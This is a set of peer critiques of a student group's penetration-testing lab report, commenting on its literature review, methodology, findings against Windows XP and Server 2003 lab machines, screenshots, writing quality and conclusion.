They continue their methodology section by restating their objective for lab 6: “to exploit three different systems using a variety of tools and methods, and discuss the results”. They began passive reconnaissance by simulating network traffic from the target VM so that they could passively gather packets to be analyzed by an OS fingerprinting tool. They used that information to determine what exploits to execute against the target system. On their third system they used Nessus and Nmap to provide system and vulnerability information. The result of their methodology was that the only vulnerable system was the Windows XP SP0 VM.
Group two’s abstract tied automated attack tools that are normally used by hackers and script kiddies to the realm of penetration testing. The abstract also gave a brief overview of what was to be accomplished in the lab six laboratory assignment.
In the literature review section of the laboratory report, group two needed to italicize the titles of the articles that were analyzed and summarized. Group two needed to tie the denial of service (DoS) article to the topic of penetration testing or to the laboratory assignment. However, the team did state “Attackers recruit machines that have vulnerabilities and exploit them using subversion.” While describing the article about password cracking, the group stated “Some password crackers, such as John the Ripper, guess until the password hash is a match.” However, I have to somewhat disagree with this statement from my experience working with these cracking tools, for these tools are only as good as the password lists they use. If the password is not in the password list, then the tool will not break the password. How does the article Modeling TCP/IP Networks Topology for Network Vulnerability Analysis relate to penetration testing? The group seemed to provide a very brief summary of this article. In relation to the article about penetration testing with firewalls, I had to agree with the group’s statement “If this is the case, a non-hacker is in charge of attempting to break into a firewall, which is like asking a non-mechanic to fix your car. The group does need to have integrity as well as experience in how an attacker would penetrate the defenses.” I do not think that the author of the article realized that hacking could be done ethically. The group did a good job finding other peculiar statements made by the author of the firewall article. When analyzing the article Mobile Test: A Tool Supporting Automatic Black Box Test for Software on Smart Mobile Devices, the group needed to relate the topic of the article, mobile phone application testing, to the laboratory assignment.
Group two’s methodology section was quite thorough and broke the team’s plan for executing this assignment into five steps. Team two’s approach to this lab was different from that of the other teams, for team two sent traffic between different virtual machines to simulate more of a realistic network environment and used this traffic to find vulnerabilities.
In the findings section of the laboratory report, team two identified the three systems that were to be tested: the Windows XP RTM VM, Windows XP SP3 VM, and Windows Server 2003 VM. The team also attempted to test Debian, but did not seem to have any luck with it. Group two, like other groups, had success exploiting Windows XP service pack 0, but the group was unable to exploit Windows XP service pack 3. From my group’s experience, I agree with the statement “After examining the list of available exploits in Metasploit as well as the other programs on the Backtrack VM, it was obvious that a fully patched Windows XP service pack three machine was not exploitable without running any third party programs.” Team two also encountered the same problems as other groups when trying to exploit Windows Server 2003; it just was not going to happen.
In the issues section, group two listed the inability of the tools to exploit Windows XP service pack 3, Windows Server 2003, and Debian. The group also had problems with the Metasploit website.
In the conclusion section, group two concluded that tools are not the end all be all of penetration testing.
I considered this team’s literature review to be rather interesting in style. I also appreciated the effort shown by attempting to exploit four machines over the required three. I thought the team did an excellent job in detailing a precise method for attack; this was strong point over many other teams’ write-ups. I was also impressed with the sheer number of screenshots, although some problems existed with these.
That there were problems with this team’s write-up is quite obvious even at a casual glance. The aforementioned screenshots, while numerous, were severely misshapen. Additionally, large images of console windows full of ping returns served little purpose, other than perhaps to fill space. As these screenshots had no titles, nor were they referenced in the body of the report, the reader was left to puzzle out the significance of each. Particularly mysterious was the last screenshot (Figure 6), as three Windows based operating systems were examined in the exercise: was this Server 2003 or XP Service Pack 3?
The team’s literature review, while intriguing, seemed to be composed of random statements at some points. For instance, the reference to ‘Subversion’: was this intended to be tongue in cheek? For a team whose members continually exhort others to scholarly excellence, this seems far out of place. In addition to this, the long quoted passage near the end of the section was exactly what it appeared to be at first glance: largely a waste of space. Furthermore, while this team seemed willing to discuss concepts related to the articles, much of it seemed designed to ‘address’ the article without actually speaking about the article (the USB discussion, for instance). Finally, although not confined only to the literature review, the writing was riddled with spelling errors. Truthfully, it must be asked: does the team possess a spellchecker? If not, many free implementations exist; to leave so many obvious spelling errors in a final draft is really inexcusable.
An analysis of the ‘Methods’ and ‘Findings’ sections reveals that the bulk of the ‘Findings’ are really items of methodology. As to the methodology itself, I find it odd that the targets were used to ‘ping’ the attacker so that ‘passive’ fingerprinting could be done. Does this really make any sense at all with respect to the concept of passive reconnaissance? It seems to me to be wholly artificial, as it is nearly certain that this will not happen in a ‘real’ situation. It might have been a superior idea to use general web browsing traffic, or Server Message Block transactions, to simulate client activity (as other groups did).
The discussion on NESSUS biases was reasonably thorough, although a few of the assertions seemed ill-conceived. Does it really seem that NESSUS is biased toward showing Windows vulnerabilities? From prior exercises, it is well understood that the number of NESSUS plug-ins which target UNIX based systems is by far in the majority. How, with this superiority of numbers in mind, is it that NESSUS consistently finds more areas of vulnerability in Windows based systems? Would not this be more indicative of problems in the Windows operating system, or a ‘bias’ in the target, if it is true? Being further critical, I did not see a thorough discussion of the effect of exploits at a specific OSI layer on the other levels of the stack. It is true, as this team presents, that it might be possible for an attacker to change information ‘rising’ in the stack; however, it seems that a discussion of encryption should somehow be tied to this concept. I was also unsatisfied with the discussion of OSI layer biases as applied to penetration testing: I think there is more going on with the issue than “developer neglect” of the lower layers. Finally, the conclusion did not do this team’s overall effort justice; a conclusion is the ‘last chance’ to make a good impression on the reader, and it must be admitted that this reader was left disappointed.
I think that group 2’s write-up for lab 6 was very good. The abstract for this lab was good and accurately described the laboratory. The literature review was good and adequately reviews the material. Group 2 answered all of the required questions for each reading. All of the citing for the literature review was done correctly. For this lab, the group answered all of the required questions and provided a good amount of detail about the steps that they used to exploit the target systems. However, the group did not try newer methods of passive OS fingerprinting, which could have made their detections less reliable. P0f is an older program; while it still works, Ettercap-ng appears to give more accurate passive OS fingerprints. Also, the group did not get into the specifics of what types of exploits they successfully ran on the target system. Finally, the conclusion was written well and accurately sums up the laboratory.
Team two presents a report that is complete but could use more detail. There is an odd shift in voice for the literature review that interrupts the flow of the document. Please use external writing resources as necessary to provide the best possible finished product.
The abstract gives a good introduction to the topic and what the group will be doing in the lab. The group states that using automated exploit tools is a new idea in the realm of the penetration tester. What have they done before? Were penetration testers just that good? Were they idiots that had no idea about hacker trends?
The literature review is not simply a list of articles. The group gives lengthy summarizations of the various articles, but does not discuss them in depth. This indicates a lack of effort, a lack of comprehension, or both. How do the articles relate to the lab? How do they relate to each other? Is there value in what the authors say? Why or why not?
The methods section is well detailed, but lacks the exact steps the group took to complete the lab and is therefore not repeatable. If the literature review is a standard part of the documentation, do you need to mention it in the methods section?
Your findings section contains details that should have been included in your methods. Why is it that you could not crack either the XP SP3 machine or the Debian Machine? Is there something about the lab environment that makes it unrealistically hard?
Why did you wait until the weekend to work on the lab? Your conclusion is valid, but lacks depth. It appears that you did not get the results you expected. Why is this so?